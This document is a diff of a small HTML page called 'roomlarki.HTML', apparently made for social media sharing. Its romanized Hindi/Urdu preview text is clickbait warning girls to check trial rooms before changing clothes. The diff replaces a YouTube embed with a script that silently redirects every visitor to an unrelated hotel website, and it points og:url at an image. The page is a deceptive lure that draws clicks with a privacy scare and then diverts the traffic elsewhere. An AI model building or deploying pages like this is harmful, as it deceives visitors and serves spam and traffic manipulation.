--- a/roomlarki.HTML
+++ b/roomlarki.HTML
@@ -5,7 +5,8 @@
 	<meta property="og:image" content="https://i.imgur.com/BiVRXK3.jpg" /> 
 	<meta property="og:description" content="Try room mein kapre badalne se pehle har larki yeh zarur deiekh le" />
 	<html>
-			<head></head>
-			<body>
-			<iframe width="340" height="190" src="https://www.youtube.com/embed/PkZVGuzz9Q0?rel=0&amp;controls=0&amp;showinfo=0" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
-			</body></html>
+	<head>
+	<meta property="og:url" content="https://i.imgur.com/BiVRXK3.jpg" />
+	<script type="text/javascript">window.location = "http://londontohotel.com/22-york-street-hotel-at-marylebone-in-london-uk/";</script>
+	</head>
+	</html>
